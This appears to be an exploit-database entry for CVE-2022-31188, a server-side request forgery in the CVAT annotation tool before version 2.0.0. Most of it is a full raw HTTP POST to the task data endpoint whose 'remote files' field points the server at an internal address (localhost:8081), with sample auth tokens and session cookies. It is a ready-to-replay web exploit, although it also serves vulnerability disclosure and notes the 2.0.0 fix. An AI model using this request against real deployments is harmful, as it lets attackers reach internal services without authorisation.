#Exploit Title: CVAT 2.0 - SSRF (Server Side Request Forgery) #Exploit Author: Emir Polat #Vendor Homepage: https://github.com/opencv/cvat #Version: < 2.0.0 #Tested On: Version 1.7.0 - Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64) #CVE: CVE-2022-31188 # Description: #CVAT is an opensource interactive video and image annotation tool for computer vision. Versions prior to 2.0.0 were found to be subject to a Server-side request forgery (SSRF) vulnerability. #Validation has been added to urls used in the affected code path in version 2.0.0. Users are advised to upgrade. POST /api/v1/tasks/2/data HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0 Accept: application/json, text/plain, */* Accept-Language:en-US,en;q=0.5 Accept-Encoding: gzip, deflate Authorization: Token 06d88f739a10c7533991d8010761df721b790b7 X-CSRFTOKEN:65s9UwX36e9v8FyiJi0KEzgMigJ5pusEK7dU4KSqgCajSBAYQxKDYCOEVBUhnIGV Content-Type: multipart/form-data; boundary=-----------------------------251652214142138553464236533436 Content-Length: 569 Origin: http://localhost:8080 Connection: close Referer:http://localhost:8080/tasks/create Cookie: csrftoken=65s9UwX36e9v8FyiJi0KEzgMigJ5pusEK7dU4KSqgCajSBAYQxKDYCOEVBUhnIGv; sessionid=dzks19fhlfan8fgq0j8j5toyrh49dned Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------251652214142138553464236533436 Content-Disposition: form-data; name="remote files[0]" http://localhost:8081 -----------------------------251652214142138553464236533436 Content-Disposition: form-data; name=" image quality" 170 -----------------------------251652214142138553464236533436 Content-Disposition: form-data; name="use zip chunks" true -----------------------------251652214142138553464236533436 Content-Disposition: form-data; name="use cache" true -----------------------------251652214142138553464236533436--